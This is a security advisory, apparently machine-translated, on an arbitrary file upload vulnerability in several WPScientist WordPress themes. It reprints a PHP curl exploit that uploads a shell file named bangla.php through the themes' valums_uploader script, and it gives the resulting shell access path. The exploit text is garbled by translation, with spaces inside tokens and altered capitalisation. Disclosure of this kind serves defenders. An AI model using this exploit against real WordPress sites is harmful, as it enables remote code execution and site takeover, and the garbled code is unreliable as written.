Arbitrary File Upload Vulnerability and repair for multiple WordPress WPScientist themes

Affected Systems:

WordPress Eptonic Theme 1.x
WordPress Lightspeed Theme 1.x
WordPress Nuance Theme 1.x

WPScientist is a series of themes used on WordPress.

Multiple WPScientist themes used by WordPress have a security vulnerability, valums_uploader/php. the php script allows you to upload files with any extension to a folder in webroot. by uploading malicious PHP scripts, attackers can execute arbitrary PHP code.

Vulnerabilities:
Lightspeed v1.1.2
Eptonic v1.4.3
Nuance v1.2.3

<* Source: JingoBD
 
Link: http://secunia.com/advisories/51714/
Http://www.securelist.com/en/advisories/51714
Http://packetstormsecurity.com/files/119241/WordPress-Valums-Uploader-Shell-Upload.html
*>

Test method:

# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit
# Date: 4-1-2013
# Author: JingoBD
# Tested on: Windows 7 And Ubuntu
# Team: BANGLADESH CYBER ARMY
# Greetz: ManInDark, Rex0Man, edevil AXE, Bedu33n, NEEL, AXIOM, And All Of My BCA Friends. They Rockz.: D
Also all bangladeshi Hacker Team ..

============================== EXPLOIT =======================

<? Php

$ Uploadfile = "bangla. php ";
$ Ch =
Curl_init ("http: // localhost/wordpress/VALUMS_UPLOADER_PATH/php. php ");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS,
Array ('qqfile' => "@ $ uploadfile "));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
$ PostResult = curl_exec ($ ch );
Curl_close ($ ch );
Print "$ postResult ";

?>

Shell Access: http: // localhost/wp-content/uploads/2013/01/bangla. php

============================================= ==========

Vendor patch:

WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://themeforest.net/item/eptonic-beyond-the-limits/241366